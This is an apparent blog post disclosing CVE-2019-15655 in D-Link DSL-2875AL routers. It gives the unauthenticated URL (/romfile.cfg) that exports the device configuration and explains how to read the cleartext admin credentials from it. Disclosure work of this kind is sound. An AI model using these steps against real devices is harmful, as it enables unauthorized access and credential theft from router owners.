CVE-2019-15655 D-Link DSL-2875AL Unauthenticated Configuration Export

 Introduction

Configuration file of D-Link DSL-2875AL devices can be exported without authentication via a crafted HTTP request to the web server. This leads to configuration file export and disclosure of credentials stored in cleartext.

Steps

Download configuration file using URL:

http://<ipaddress>/romfile.cfg

Obtain the username and password from the  Account tag in downloaded romfile.cfg XML file.



Video



Comments

Popular posts from this blog

Extract / Create Cramfs File System from Ubuntu 20.04

Dump memory to file from U-Boot console using Memory Display (md) log

Firmadyne Installation & Emulation of Firmware